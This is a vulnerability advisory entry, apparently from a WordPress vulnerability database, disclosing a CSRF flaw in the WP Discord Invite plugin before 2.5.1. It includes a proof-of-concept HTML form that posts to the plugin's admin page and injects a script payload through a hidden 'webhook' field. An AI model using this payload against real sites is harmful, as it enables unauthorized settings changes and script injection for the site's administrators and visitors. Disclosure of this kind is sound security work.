WordPress Plugin Vulnerabilities
WP Discord Invite < 2.5.1 - Arbitrary Settings Update via CSRF
Description
The plugin does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.
Proof of Concept
<html> <body> <form method="POST" action="http://127.0.0.1/wp-admin/admin.php?page=wp-discord-invite-count"> <input type="hidden" name="wp-discord-invite-oauth" value="1"/> <input type="hidden" name="webhook" value='"><script>alert(1);</script>'/> <input type="submit" value="Submit"> </form> </body> <html>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Enrico Marcolini, Claudio Marchesini
Submitter
Enrico Marcolini, Claudio Marchesini
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-26 (about 7 months ago)
Added
2023-09-26 (about 7 months ago)
Last Updated
2023-09-26 (about 7 months ago)